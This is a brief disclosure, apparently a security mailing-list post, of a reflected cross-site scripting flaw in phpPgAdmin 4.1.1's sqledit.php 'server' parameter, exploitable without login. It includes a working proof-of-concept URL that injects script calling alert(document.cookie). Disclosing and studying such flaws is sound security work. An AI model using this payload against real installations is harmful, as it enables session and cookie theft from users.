There is a JavaScript code Injection in phpPgAdmin which fails to correctly sanitize user supplied data. As a result very simple XSS is possible. This was tested on phpPgAdmin 4.1.1 as not logged user.<br>PoC:<br><a href="https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.cookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//">
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow&#39;);alert(document.cookie);alert(&#39;phpPgAdmin%204.1.1%20XSS%20Vulnerability&#39;);//</a><br>Regards Michal Majchrowicz.<br>Hack.pl<br>